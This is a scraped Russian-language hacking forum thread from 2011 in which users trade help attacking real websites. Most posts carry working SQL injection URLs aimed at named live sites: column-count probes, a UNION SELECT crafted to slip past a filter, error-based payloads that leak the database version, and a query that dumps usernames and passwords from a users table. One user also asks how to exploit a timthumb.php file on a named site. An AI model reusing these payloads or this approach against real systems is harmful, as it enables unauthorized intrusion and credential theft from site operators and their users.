 |
|
05.12.2011, 20:59
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от stan0009
Товарищи! Нужна ваша помощь!
короче вчера вечером тупо лазил по инету и на одной страничке нашел примерно такое:
подскажите вид уязвимости^^
а далее сам чего нибудь накручу
если не получится то конешно отдам вам на растерзание))
/thread12123-including.html
/thread232773.html
но если ты тупо лазил, то уязвимости там скорее всего нет, просто ошибка подключения файла.
|
|
|
05.12.2011, 21:56
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами:
7638806
Репутация:
-6
|
|
Код:
http://www.mp3hungama.com/music/genre_albums.php?id=-3+order+by+1,2,3,4+--+
Shows "Unknown column '4' in 'order clause'
Код:
http://www.mp3hungama.com/music/genre_albums.php?id=-3%27+/!*union*/+/!*select*/+1,2,3+--+
Showing
406 Not Acceptable
This request is not acceptable
Also, another problem.
Код:
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+order+by+5 (works)!
Код:
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+union+select+1,2,3,4+--+
Nothing works! |
|
|
|
05.12.2011, 22:59
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от lightangel
Код:
http://www.mp3hungama.com/music/genre_albums.php?id=-3+order+by+1,2,3,4+--+
Shows "Unknown column '4' in 'order clause'
Код:
http://www.mp3hungama.com/music/genre_albums.php?id=-3%27+/!*union*/+/!*select*/+1,2,3+--+
Showing
406 Not Acceptable
This request is not acceptable
Also, another problem.
Код:
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+order+by+5 (works)!
Код:
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+union+select+1,2,3,4+--+
Nothing works! http://www.mp3hungama.com/music/genre_albums.php?id=3+or+1+group+by+concat(version (),rand(0)|0)+%0A+having+%0A+min(0)--+
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=1'+or+1+group+by+concat(version(), rand(0)|0)+having+min(0)--+
|
|
|
|
06.12.2011, 20:15
|
|
Познающий
Регистрация: 19.12.2008
Сообщений: 41
С нами:
9153939
Репутация:
5
|
|
Что с этим можно сделать ?
Код:
http://???????.com/wp-content/themes/rttheme9/timthumb.php
|
|
|
|
06.12.2011, 20:23
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Гуглится легко:
/showpost.php?p=2792868&postcount=170
|
|
|
|
06.12.2011, 20:25
|
|
Познающий
Регистрация: 19.12.2008
Сообщений: 41
С нами:
9153939
Репутация:
5
|
|
Сообщение от Ereee
Гуглится легко:
/showpost.php?p=2792868&postcount=170
Большое спасибо !
|
|
|
|
06.12.2011, 20:54
|
|
Познающий
Регистрация: 19.12.2008
Сообщений: 41
С нами:
9153939
Репутация:
5
|
|
Что-то не получается, прошу помощи
Код:
http://fusescience.com/wp-content/themes/rttheme9/timthumb.php
|
|
|
|
06.12.2011, 21:36
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами:
8960082
Репутация:
-14
|
|
Сообщение от XAOCX
Что-то не получается, прошу помощи
Код:
http://fusescience.com/wp-content/themes/rttheme9/timthumb.php
Это не уязвимость
|
|
|
|
06.12.2011, 21:37
|
|
Познающий
Регистрация: 19.12.2008
Сообщений: 41
С нами:
9153939
Репутация:
5
|
|
Сообщение от aydin-ka
Это не уязвимость
А как же это ?
Сообщение от Ereee
Гуглится легко:
/showpost.php?p=2792868&postcount=170
|
|
|
|
06.12.2011, 23:06
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами:
9849598
Репутация:
126
|
|
нашел скулю на сайте и при выводе пароля пишет такую лабуду
skankjo:�{�o��
сайт латвийский. Как решить вопрос? как поставить кодировку итальянскую себе в браузер?
Сообщение от None
=3+and+1=0+Union+Select%20+1,UNHEX%28HEX%28concat_ ws%280x3a,username,password%29%29%29%20,3,4,5,6+fr om+tbl_users+limit+3,3%20--
сам запрос |
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
